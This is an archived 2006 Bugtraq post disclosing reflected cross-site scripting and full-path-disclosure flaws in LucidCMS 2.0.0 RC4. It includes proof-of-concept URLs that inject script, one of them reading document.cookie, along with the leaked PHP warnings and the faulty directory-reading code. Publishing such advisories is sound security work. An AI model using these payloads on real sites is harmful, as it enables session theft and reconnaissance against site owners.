[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060402130713.wldv1cwbw4gc0wwk@webmail.kecoak.or.id>
Date: Sun, 02 Apr 2006 13:07:13 +0700
From: crasher@...oak.or.id
To: bugtraq@...urityfocus.com
Subject: Multiple Vulnerabilities in LucidCMS
Multiple Vulnerabilities in LucidCMS
Author : Rusydi Hasan M
a.k.a : cR45H3R
Date : April,1st 2006
Location : Indonesia, Cilacap
--- Software description
lucidCMS is a simple and flexible content management system for
the individual or organization that wishes to manage a collection
of web pages without the overhead and complexity of other available
open source "community" CMS options.
HOME : http://lucidCMS.net
Version : 2.0.0 RC4
--- The bugs
There's 2 bugs.XSS and full path disclosures
--- PoC
1. XSS a.k.a Cross site scripting
How the Proof of concepts ?
http://[victim]/[lucidcms_dir]/index.php?command=login'>[XSS_here]
http://[victim]/[lucidcms_dir]/index.php?i18n=cs_CZ&command=panel'>[XSS_here]
http://[victim]/[lucidcms_dir]/index.php?i18n=en_US&command=panel'>[XSS_here]
example :
http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel'><script>alert(document.cookie)</script>
http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel'><h1>Bla bla
bla</h1>
http://127.0.0.1/lucidcms/index.php?command=login'><script>alert('patch your
lucidCMS')</script>
http://127.0.0.1/lucidcms/index.php?i18n=cs_CZ&command=panel'><h1>stooopidz</h1>
2. Full path disclosures
in /lucid_phplib/translator.php
http://[victim]/[lucidcms_dir]/lucid_phplib/translator.php
Warning: opendir(DIR_LANG): failed to open dir: No such file or directory in
/var/www/html/lucidcms/lucid_phplib/translator.php on line 45
Warning: readdir(): supplied argument is not a valid Directory resource in
/var/www/html/lucidcms/lucid_phplib/translator.php on line 46
Where's the problem ???
function get_languages(){
$langs = array();
$dir = opendir(DIR_LANG); <-- This is the trouble
while($name = readdir($dir)) { <-- and this too
if ($name == '.' || $name== '..') continue;
$langFile = DIR_LANG.$name.'/LC_MESSAGES/'.CONFIG_DOMAIN.'.mo';
if (file_exists($langFile)) {
// $GLOBALS['echoLater'][] = $langFile; //troublshooting...
$langs[] = $name;
}
}
return $langs;
}//get_languages
--- vendor
I'm too lazy :D .
--- shoutz
1. kecoak
(fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,etc)
2. echo staff (y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32,
anonymous, the day)
3. ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,negative,sakitjiwa
--- contact
crasher@...oak.or.id
Powered by blists - more mailing lists